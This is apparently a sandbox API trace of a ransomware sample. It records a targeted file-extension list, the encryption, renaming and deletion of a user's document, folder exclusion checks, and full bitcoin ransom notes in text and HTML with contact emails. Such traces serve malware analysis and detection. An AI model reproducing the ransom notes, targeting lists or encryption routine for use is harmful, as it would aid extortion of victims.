.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.689] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.689] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.689] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.694] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x10fda, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x10fda, lpOverlapped=0x0) returned 1
	[0189.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.698] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcbaa0) returned 1
	[0189.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.700] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.700] CryptHashData (hHash=0xfb9670, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.700] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb9670, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8eb0) returned 1
	[0189.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.701] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10fda, dwBufLen=0x10fda | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x10fe0) returned 1
	[0189.702] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.703] RtlMoveMemory (in: Destination=0xfee168, Source=0xfdd180, Length=0x10fda | out: Destination=0xfee168) 
	[0189.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.703] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfee168*, pdwDataLen=0x18a1ec*=0x10fda, dwBufLen=0x10fe0 | out: pbData=0xfee168*, pdwDataLen=0x18a1ec*=0x10fe0) returned 1
	[0189.705] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.705] CryptDestroyKey (hKey=0xfb8eb0) returned 1
	[0189.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.777] CryptDestroyHash (hHash=0xfb9670) returned 1
	[0189.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.777] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0189.777] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.777] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.778] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.779] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 136
	[0189.779] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.780] WriteFile (in: hFile=0x390, lpBuffer=0xfee168*, nNumberOfBytesToWrite=0x10fe0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfee168*, lpNumberOfBytesWritten=0x18a648*=0x10fe0, lpOverlapped=0x0) returned 1
	[0189.785] CloseHandle (hObject=0x390) returned 1
	[0189.786] CloseHandle (hObject=0x388) returned 1
	[0189.786] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf")) returned 1
	[0189.793] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf")) returned 0
	[0189.793] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a634bd0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x7dd31d00, ftLastAccessTime.dwHighDateTime=0x1d97519, ftLastWriteTime.dwLowDateTime=0x7dd31d00, ftLastWriteTime.dwHighDateTime=0x1d97519, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZZM5X5JXuESk93xmmp.rtf", cAlternateFileName="ZZM5X5~1.RTF")) returned 0
	[0189.793] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0189.793] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0189.795] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy"
	[0189.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*"
	[0189.795] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.796] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.796] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.TXT") returned 99
	[0189.796] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0189.796] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0189.796] WriteFile (in: hFile=0x2c0, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0189.804] CloseHandle (hObject=0x2c0) returned 1
	[0189.804] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.805] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0189.806] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0189.806] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0189.806] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0189.806] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0189.806] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0189.807] CloseHandle (hObject=0x2c0) returned 1
	[0189.807] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.807] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.807] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0189.807] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.HTML") returned 100
	[0189.807] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0189.808] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0189.808] WriteFile (in: hFile=0x2c0, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0189.810] CloseHandle (hObject=0x2c0) returned 1
	[0189.810] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.811] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.811] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0189.849] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0189.849] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0189.849] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0189.849] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0189.850] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0189.850] CloseHandle (hObject=0x2c0) returned 1
	[0189.850] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0x8aa78213, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aa9e526, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0189.850] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*") returned 75
	[0189.850] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.851] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*", cchLength=0x4b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*") returned 0x4b
	[0189.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.851] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="windows") returned 0x0
	[0189.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.851] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="boot") returned 0x0
	[0189.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.851] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="system volume information") returned 0x0
	[0189.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0189.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="temp") returned 0x0
	[0189.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="program files") returned 0x0
	[0189.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="program files (x86)") returned 0x0
	[0189.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.853] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="appdata") returned 0x0
	[0189.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.853] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="application data") returned 0x0
	[0189.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.853] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="winnt") returned 0x0
	[0189.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.853] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="tmp") returned 0x0
	[0189.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.853] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="cache") returned 0x0
	[0189.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.854] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="temporary internet files") returned 0x0
	[0189.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.854] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="webcache") returned 0x0
	[0189.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.854] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="inetcache") returned 0x0
	[0189.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.854] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="nvidia") returned 0x0
	[0189.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.855] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="packages") returned 0x0
	[0189.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.855] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="cookies") returned 0x0
	[0189.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.855] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="programdata") returned 0x0
	[0189.855] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0189.855] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0x8aa78213, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aa9e526, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0189.856] lstrcmpW (lpString1="..", lpString2="..") returned 0
